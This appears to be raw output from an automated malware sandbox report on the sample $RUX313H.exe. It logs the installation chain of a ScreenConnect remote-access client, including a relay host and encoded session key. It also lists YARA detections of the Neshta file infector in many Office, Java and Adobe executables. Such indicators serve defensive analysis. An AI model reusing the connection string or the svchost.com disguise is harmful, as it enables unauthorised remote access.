Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\AppData\Local\Temp\MSIFE41.tmp',zzzzInvokeManagedCustomActionOutOfProc SfxCA_6160500 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
Source: C:\Windows\System32\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding CB8DBADD131F30B4DC6FBBC948643C7D
Source: C:\Windows\System32\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 4E4F6FBCD6D549CE2F7F73B63973119C E Global\MSI0000
Source: unknown | Process created: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exe 'C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exe' '?e=Access&y=Guest&h=instance-qchhoo-relay.screenconnect.com&p=443&s=da6b3e03-98fc-419f-a376-8535999f3893&k=BgIAAACkAABSU0ExAAgAAAEAAQCXhSdnV8AclTo6Qg2d%2fUagHnAuTk77VdidkN%2fHwklWj60Ukj2cjyUWF%2fyj6%2bi86j%2f4iIiD4EcKkvFNApE%2f%2fmy7V5iz8I7WLvfaBXsciWcr9yEcfZSl4AvW0iWJ2LVg8s%2bvTxK6lFGCfPmCOGop3GjLhAffGO2uiyhzZdY3cdBnrxVR1d2KV8lAELZ5VBoUfKrKrkChwusd1M6gHfzfqZEpzKJahX9yu4v97YxVChPN3WG0TWWhcEs0ZJpQzPn3g2NaZ6xL5%2bVj8rp0nPDBPjXcy%2fWFzRXbyKOD%2fA0vieIxBiRLOIqNVTkIntBIZAUsEi%2bi0gvAM%2f6xLcwwLQe0K7rN'
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exe | Process created: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe 'C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe' 'RunRole' 'c39657e2-0cc8-4a24-afd0-5db7dcfd0e5b' 'User'
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown | Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: C:\Users\user\Desktop\$RUX313H.exe | Process created: C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exe 'C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exe'
Source: C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exe | Process created: C:\Windows\svchost.com 'C:\Windows\svchost.com' 'C:\Windows\System32\msiexec.exe' /i 'C:\Users\user\AppData\Local\Temp\setup.msi'
Source: C:\Windows\svchost.com | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /i C:\Users\user\AppData\Local\Temp\setup.msi
Source: C:\Windows\System32\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 0182DFF70E04F7ABAC76BB82B6886C6B C
Source: C:\Windows\System32\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding CB8DBADD131F30B4DC6FBBC948643C7D
Source: C:\Windows\System32\msiexec.exe | Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 4E4F6FBCD6D549CE2F7F73B63973119C E Global\MSI0000
Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\AppData\Local\Temp\MSIFE41.tmp',zzzzInvokeManagedCustomActionOutOfProc SfxCA_6160500 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exe | Process created: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe 'C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe' 'RunRole' 'c39657e2-0cc8-4a24-afd0-5db7dcfd0e5b' 'User'
Source: C:\Users\user\Desktop\$RUX313H.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Source: C:\Users\user\Desktop\$RUX313H.exe | File created: C:\Users\user\AppData\Local\Temp\3582-490
Source: C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\rundll32.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\AppData\Local\Temp\MSIFE41.tmp',zzzzInvokeManagedCustomActionOutOfProc SfxCA_6160500 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
Source: C:\Windows\svchost.com | Mutant created: \Sessions\1\BaseNamedObjects\MutexPolesskayaGlush*.* svchost.com n X . t N t h ` T 5 @
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exe | Mutant created: \BaseNamedObjects\Global\netfxeventlog.1.0
Source: C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exe | Command line argument: mscoree.dll 1_2_00DF1140
Source: C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exe | Command line argument: v4.0.30319 1_2_00DF1140
Source: C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exe | Command line argument: _RESOLVER 1_2_00DF1140
Source: C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exe | Command line argument: _ENTRYPOINT 1_2_00DF1140
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exe | Command line argument: GetServiceName 9_2_003F1880
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exe | Command line argument: Service 9_2_003F1880
Source: $RUX313H.exe | String found in binary or memory: $F294ACFC-3146-4483-A7BF-ADDCA7C260E2
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: $RUX313H.exe | Static file information: File size 4193672 > 1048576
Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetRunner.pdbzz source: $RUX313H.exe, 00000000.00000003.661153021.00000000022C0000.00000004.00000001.sdmp, $RUX313H.exe, 00000001.00000000.663867933.0000000000DF9000.00000002.00020000.sdmp
Source: Binary string: C:\build\work\eca3d12b\wix3\build\ship\x86\wixca.pdb source: $RUX313H.exe, 00000000.00000003.661583670.0000000002624000.00000004.00000001.sdmp, $RUX313H.exe, 00000001.00000002.681431561.0000000004977000.00000004.00000001.sdmp
Source: Binary string: c:\Users\jmorgan\Source\ScreenConnectWork\Custom\DotNetRunner\DotNetResolver\obj\Release\DotNetResolver.pdb source: $RUX313H.exe, 00000000.00000003.661583670.0000000002624000.00000004.00000001.sdmp, $RUX313H.exe, 00000001.00000002.675339509.0000000003410000.00000004.00020000.sdmp
Source: Binary string: E:\delivery\Dev\wix37_public\build\ship\x86\SfxCA.pdb source: $RUX313H.exe, 00000000.00000003.661576351.000000000261D000.00000004.00000001.sdmp, $RUX313H.exe, 00000001.00000002.674045207.000000000115B000.00000002.00020000.sdmp
Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetRunner.pdb source: $RUX313H.exe, $RUX313H.exe, 00000001.00000000.663867933.0000000000DF9000.00000002.00020000.sdmp
Source: C:\Users\user\Desktop\$RUX313H.exe | Code function: 0_3_022C0482 pushfd ; ret 0_3_022C0489
Source: C:\Users\user\Desktop\$RUX313H.exe | Code function: 0_3_022C1DF5 pushfd ; iretd 0_3_022C1FED
Source: C:\Users\user\Desktop\$RUX313H.exe | Code function: 0_3_022C0442 pushad ; ret 0_3_022C0461
Source: C:\Users\user\Desktop\$RUX313H.exe | Code function: 0_3_022C60DD push es; retf 0000h 0_3_022C60F8
Source: C:\Users\user\Desktop\$RUX313H.exe | Code function: 0_2_0040802C push 00408052h; ret 0_2_0040804A
Source: C:\Users\user\Desktop\$RUX313H.exe | Code function: 0_2_004070A4 push 004070D0h; ret 0_2_004070C8
Source: C:\Users\user\Desktop\$RUX313H.exe | Code function: 0_2_004041D8 push 00404204h; ret 0_2_004041FC
Source: C:\Users\user\Desktop\$RUX313H.exe | Code function: 0_2_004041A0 push 004041CCh; ret 0_2_004041C4
Source: C:\Users\user\Desktop\$RUX313H.exe | Code function: 0_2_00404256 push 00404284h; ret 0_2_0040427C
Source: C:\Users\user\Desktop\$RUX313H.exe | Code function: 0_2_00404258 push 00404284h; ret 0_2_0040427C
Source: C:\Users\user\Desktop\$RUX313H.exe | Code function: 0_2_00404210 push 0040423Ch; ret 0_2_00404234
Source: C:\Users\user\Desktop\$RUX313H.exe | Code function: 0_2_004042C8 push 004042F4h; ret 0_2_004042EC
Source: C:\Users\user\Desktop\$RUX313H.exe | Code function: 0_2_00404290 push 004042BCh; ret 0_2_004042B4
Source: C:\Users\user\Desktop\$RUX313H.exe | Code function: 0_2_00404370 push 0040439Ch; ret 0_2_00404394
Source: C:\Users\user\Desktop\$RUX313H.exe | Code function: 0_2_00404300 push 0040432Ch; ret 0_2_00404324
Source: C:\Users\user\Desktop\$RUX313H.exe | Code function: 0_2_00404338 push 00404364h; ret 0_2_0040435C
Source: C:\Users\user\Desktop\$RUX313H.exe | Code function: 0_2_004043E0 push 0040440Ch; ret 0_2_00404404
Source: C:\Users\user\Desktop\$RUX313H.exe | Code function: 0_2_004043A8 push 004043D4h; ret 0_2_004043CC
Source: C:\Users\user\Desktop\$RUX313H.exe | Code function: 0_2_00410778 push 00406D36h; ret 0_2_004107C6
Source: C:\Users\user\Desktop\$RUX313H.exe | Code function: 0_2_0040D7C0 push 00403D79h; ret 0_2_0040D809
Source: C:\Users\user\Desktop\$RUX313H.exe | Code function: 0_2_0040D9F0 push 00403F84h; ret 0_2_0040DA14
Source: C:\Users\user\Desktop\$RUX313H.exe | Code function: 0_2_0040DA28 push 00403FBCh; ret 0_2_0040DA4C
Source: C:\Users\user\Desktop\$RUX313H.exe | Code function: 0_2_00411AC4 push 00408052h; ret 0_2_00411AE2
Source: C:\Users\user\Desktop\$RUX313H.exe | Code function: 0_2_00410B3C push 004070D0h; ret 0_2_00410B60
Source: C:\Users\user\Desktop\$RUX313H.exe | Code function: 0_2_0040DC70 push 00404204h; ret 0_2_0040DC94
Source: C:\Users\user\Desktop\$RUX313H.exe | Code function: 0_2_0040DC38 push 004041CCh; ret 0_2_0040DC5C
Source: C:\Users\user\Desktop\$RUX313H.exe | Code function: 0_2_00406CE0 push 00406D36h; ret 0_2_00406D2E
Source: C:\Users\user\Desktop\$RUX313H.exe | Code function: 0_2_0040DCEE push 00404284h; ret 0_2_0040DD14
Source: C:\Users\user\Desktop\$RUX313H.exe | Code function: 0_2_0040DCF0 push 00404284h; ret 0_2_0040DD14
Source: C:\Users\user\Desktop\$RUX313H.exe | Code function: 0_2_0040DCA8 push 0040423Ch; ret 0_2_0040DCCC
Source: C:\Users\user\Desktop\$RUX313H.exe | Code function: 0_2_0040DD60 push 004042F4h; ret 0_2_0040DD84
Source: C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exe | Code function: 1_2_00DF1140 LoadLibraryW,GetProcAddress,CorBindToRuntimeEx, 1_2_00DF1140
Source: CNFNOT32.EXE.0.dr | Static PE information: real checksum: 0x0 should be: 0x23b40
Source: AdobeARMHelper.exe.0.dr | Static PE information: real checksum: 0x0 should be: 0x22323
Source: vcredist_x86.exe.0.dr | Static PE information: real checksum: 0x0 should be: 0x1f4c7
Source: jaureg.exe.0.dr | Static PE information: real checksum: 0x0 should be: 0x1c9d4
Source: UcMapi.exe.0.dr | Static PE information: real checksum: 0x0 should be: 0x14582
Source: SCANPST.EXE.0.dr | Static PE information: real checksum: 0x0 should be: 0x20cf9
Source: arh.exe.0.dr | Static PE information: real checksum: 0x0 should be: 0x21b40
Source: VPREVIEW.EXE.0.dr | Static PE information: real checksum: 0x0 should be: 0x19599
Source: Setup.exe.0.dr | Static PE information: real checksum: 0x0 should be: 0x17061
Source: Eula.exe.0.dr | Static PE information: real checksum: 0x0 should be: 0x2234d
Source: NAMECONTROLSERVER.EXE.0.dr | Static PE information: real checksum: 0x0 should be: 0x16845
Source: wow_helper.exe.0.dr | Static PE information: real checksum: 0x0 should be: 0x21fef
Source: MSOSQM.EXE.0.dr | Static PE information: real checksum: 0x0 should be: 0x235bb
Source: javaws.exe.0.dr | Static PE information: real checksum: 0x0 should be: 0x1b488
Source: IEContentService.exe.0.dr | Static PE information: real checksum: 0x0 should be: 0x243fc
Source: AcroBroker.exe.0.dr | Static PE information: real checksum: 0x0 should be: 0x1a934
Source: GoogleUpdate.exe.0.dr | Static PE information: real checksum: 0x0 should be: 0x20a1d
Source: LICLUA.EXE.0.dr | Static PE information: real checksum: 0x0 should be: 0x1cad0
Source: FLTLDR.EXE.0.dr | Static PE information: real checksum: 0x0 should be: 0x21f3e
Source: Uninstall.exe.0.dr | Static PE information: real checksum: 0x0 should be: 0x1d32d
Source: SPREADSHEETCOMPARE.EXE.0.dr | Static PE information: real checksum: 0x0 should be: 0x22a8d
Source: SETLANG.EXE.0.dr | Static PE information: real checksum: 0x0 should be: 0x1720a
Source: GoogleUpdateOnDemand.exe.0.dr | Static PE information: real checksum: 0x0 should be: 0x2437a
Source: upx.exe.0.dr | Static PE information: real checksum: 0x0 should be: 0x164ff
Source: ChromeSetup.exe.0.dr | Static PE information: real checksum: 0x0 should be: 0x2056a
Source: AcroRd32.exe.0.dr | Static PE information: real checksum: 0x0 should be: 0x221b2
Source: MSQRY32.EXE.0.dr | Static PE information: real checksum: 0x0 should be: 0x21c24
Source: LogTransport2.exe.0.dr | Static PE information: real checksum: 0x0 should be: 0x225e4
Source: GoogleCrashHandler64.exe.0.dr | Static PE information: real checksum: 0x0 should be: 0x1cb20
Source: java.exe.0.dr | Static PE information: real checksum: 0x0 should be: 0x1ed6b
Source: MSOSREC.EXE.0.dr | Static PE information: real checksum: 0x0 should be: 0x23c4e
Source: MSOXMLED.EXE.0.dr | Static PE information: real checksum: 0x0 should be: 0x19d4c
Source: XLICONS.EXE.0.dr | Static PE information: real checksum: 0x0 should be: 0x22ef5
Source: jucheck.exe.0.dr | Static PE information: real checksum: 0x0 should be: 0x199ab
Source: setup.exe1.0.dr | Static PE information: real checksum: 0x0 should be: 0x1b872
Source: vcredist_x86.exe0.0.dr | Static PE information: real checksum: 0x0 should be: 0x1e008
Source: GoogleUpdateSetup.exe.0.dr | Static PE information: real checksum: 0x0 should be: 0x2056a
Source: ose.exe.0.dr | Static PE information: real checksum: 0x0 should be: 0x144d6
Source: MSOUC.EXE.0.dr | Static PE information: real checksum: 0x0 should be: 0x14772
Source: CMigrate.exe.0.dr | Static PE information: real checksum: 0x0 should be: 0x1f505
Source: SELFCERT.EXE.0.dr | Static PE information: real checksum: 0x0 should be: 0x201a6
Source: AdobeARM.exe.0.dr | Static PE information: real checksum: 0x0 should be: 0x186de
Source: AutoIt3_x64.exe.0.dr | Static PE information: real checksum: 0x0 should be: 0x1f8c9
Source: GRAPH.EXE.0.dr | Static PE information: real checksum: 0x0 should be: 0x20792
Source: $RUX313H.exe.0.dr | Static PE information: real checksum: 0x3faf91 should be: 0x412efd
Source: 32BitMAPIBroker.exe.0.dr | Static PE information: real checksum: 0x0 should be: 0x2256d
Source: javaw.exe0.0.dr | Static PE information: real checksum: 0x0 should be: 0x1fc3e
Source: 64BitMAPIBroker.exe.0.dr | Static PE information: real checksum: 0x0 should be: 0x22975
Source: lync99.exe.0.dr | Static PE information: real checksum: 0x0 should be: 0x1d2a1
Source: Aut2exe_x64.exe.0.dr | Static PE information: real checksum: 0x0 should be: 0x2138e
Source: WCChromeNativeMessagingHost.exe.0.dr | Static PE information: real checksum: 0x0 should be: 0x1e9e1
Source: javaw.exe.0.dr | Static PE information: real checksum: 0x0 should be: 0x1fc3e
Source: ACCICONS.EXE.0.dr | Static PE information: real checksum: 0x0 should be: 0x22470
Source: jp2launcher.exe.0.dr | Static PE information: real checksum: 0x0 should be: 0x1dede
Source: ADelRCP.exe.0.dr | Static PE information: real checksum: 0x0 should be: 0x15475
Source: reader_sl.exe.0.dr | Static PE information: real checksum: 0x0 should be: 0x1816b
Source: AdobeCollabSync.exe.0.dr | Static PE information: real checksum: 0x0 should be: 0x1bed2
Source: OcPubMgr.exe.0.dr | Static PE information: real checksum: 0x0 should be: 0x16239
Source: setup.exe0.0.dr | Static PE information: real checksum: 0x0 should be: 0x159ae
Source: AutoIt3Help.exe.0.dr | Static PE information: real checksum: 0x0 should be: 0x19687
Source: ssvagent.exe.0.dr | Static PE information: real checksum: 0x0 should be: 0x1a6f3
Source: MSOSYNC.EXE.0.dr | Static PE information: real checksum: 0x0 should be: 0x1d897
Source: Au3Info.exe.0.dr | Static PE information: real checksum: 0x0 should be: 0x1ec32
Source: GoogleUpdateCore.exe.0.dr | Static PE information: real checksum: 0x0 should be: 0x14e00
Source: vcredist_x64.exe.0.dr | Static PE information: real checksum: 0x0 should be: 0x22862
Source: filecompare.exe.0.dr | Static PE information: real checksum: 0x0 should be: 0x1fa61
Source: WORDICON.EXE.0.dr | Static PE information: real checksum: 0x0 should be: 0x21d86
Source: VC_redist.x64.exe.0.dr | Static PE information: real checksum: 0x0 should be: 0x1cbae
Source: MSOHTMED.EXE.0.dr | Static PE information: real checksum: 0x0 should be: 0x1caea
Source: ODeploy.exe.0.dr | Static PE information: real checksum: 0x0 should be: 0x1f300
Source: OSE.EXE.0.dr | Static PE information: real checksum: 0x0 should be: 0x23194
Source: GoogleUpdateBroker.exe.0.dr | Static PE information: real checksum: 0x0 should be: 0x18cbd
Source: Au3Info_x64.exe.0.dr | Static PE information: real checksum: 0x0 should be: 0x1b2a8
Source: PPTICO.EXE.0.dr | Static PE information: real checksum: 0x0 should be: 0x1bde3
Source: CSISYNCCLIENT.EXE.0.dr | Static PE information: real checksum: 0x0 should be: 0x1aab7
                          Source: lynchtmlconv.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x1eb59
                          Source: Au3Check.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x1e357
                          Source: setup.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x19b30
                          Source: ONENOTEM.EXE.0.drStatic PE information: real checksum: 0x0 should be: 0x17d8c
                          Source: armsvc.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x1efef
                          Source: ONENOTE.EXE.0.drStatic PE information: real checksum: 0x0 should be: 0x15fc4
                          Source: GoogleCrashHandler.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x23758
                          Source: VC_redist.x86.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x22df4
                          Source: unpack200.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x21a51
                          Source: RdrCEF.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x14f4c
                          Source: javacpl.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x20a45
                          Source: VSTOInstaller.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x1924c
                          Source: MSOICONS.EXE.0.drStatic PE information: real checksum: 0x0 should be: 0x1eca7
                          Source: FIRSTRUN.EXE.0.drStatic PE information: real checksum: 0x0 should be: 0x14f50
                          Source: vcredist_x64.exe0.0.drStatic PE information: real checksum: 0x0 should be: 0x18311
                          Source: MSIFE41.tmp.3.drStatic PE information: real checksum: 0x2f213 should be: 0x60485
                          Source: FullTrustNotifier.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x21a65
                          Source: jusched.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x1f4c3
                          Source: DW20.EXE.0.drStatic PE information: real checksum: 0x0 should be: 0x14970
                          Source: SciTE.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x1626c
                          Source: CLVIEW.EXE.0.drStatic PE information: real checksum: 0x0 should be: 0x19022
                          Source: DWTRIG20.EXE.0.drStatic PE information: real checksum: 0x0 should be: 0x1f1bf
                          Source: WINWORD.EXE.0.drStatic PE information: real checksum: 0x0 should be: 0x196cf
                          Source: AppSharingHookController.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x18f7c
                          Source: Aut2exe.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x1c0ea
                          Source: AcroTextExtractor.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x1d3d9
                          Source: $RUX313H.exeStatic PE information: real checksum: 0x0 should be: 0x40fd3c
                          Source: Oarpmany.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x19641
                          Source: java.exe0.0.drStatic PE information: real checksum: 0x0 should be: 0x1ed6b
                          Source: SQLDumper.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x175b8
                          Source: GoogleUpdateComRegisterShell64.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x15bfd
                          Source: protocolhandler.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x1c662
                          Source: POWERPNT.EXE.0.drStatic PE information: real checksum: 0x0 should be: 0x1f54c
                          Source: OLicenseHeartbeat.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x1da0b
                          Source: DATABASECOMPARE.EXE.0.drStatic PE information: real checksum: 0x0 should be: 0x1b57b
                          Source: javaws.exe0.0.drStatic PE information: real checksum: 0x0 should be: 0x1b488
                          Source: svchost.com.0.drStatic PE information: real checksum: 0x0 should be: 0x106fc
                          Source: misc.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x23d46

                          Persistence and Installation Behavior:

                          Yara detected Neshta
                          Source: Yara match | File source: $RUX313H.exe, type: SAMPLE
                          Source: Yara match | File source: 2.2.svchost.com.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 0.0.$RUX313H.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 0.2.$RUX313H.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 2.0.svchost.com.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 00000000.00000002.1190838929.0000000000409000.00000004.00020000.sdmp, type: MEMORY
                          Source: Yara match | File source: 00000002.00000002.1189138838.0000000000409000.00000004.00020000.sdmp, type: MEMORY
                          Source: Yara match | File source: Process Memory Space: $RUX313H.exe PID: 6336, type: MEMORYSTR
                          Source: Yara match | File source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOICONS.EXE, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\OcPubMgr.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Common Files\microsoft shared\Source Engine\OSE.EXE, type: DROPPED
                          Source: Yara match | File source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\ose.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\NAMECONTROLSERVER.EXE, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\CNFNOT32.EXE, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Oarpmany.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\Office Setup Controller\Setup.exe, type: DROPPED
                          Source: Yara match | File source: C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdate.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Common Files\microsoft shared\VSTO\10.0\VSTOInstaller.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\SCANPST.EXE, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\DCF\DATABASECOMPARE.EXE, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\ssvagent.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\FIRSTRUN.EXE, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\AutoIt3\Au3Info.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\java.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_885250\javaw.exe, type: DROPPED
                          Source: Yara match | File source: C:\ProgramData\Package Cache\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\vcredist_x86.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\DCF\SPREADSHEETCOMPARE.EXE, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\AppSharingHookController.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\VPREVIEW.EXE, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateBroker.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\DCF\filecompare.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\CMigrate.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Common Files\microsoft shared\OFFICE16\MSOXMLED.EXE, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\unpack200.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\misc.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\MSQRY32.EXE, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javacpl.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\MSOSYNC.EXE, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Microsoft Office\Office16\MSOHTMED.EXE, type: DROPPED
                          Source: Yara match | File source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe, type: DROPPED
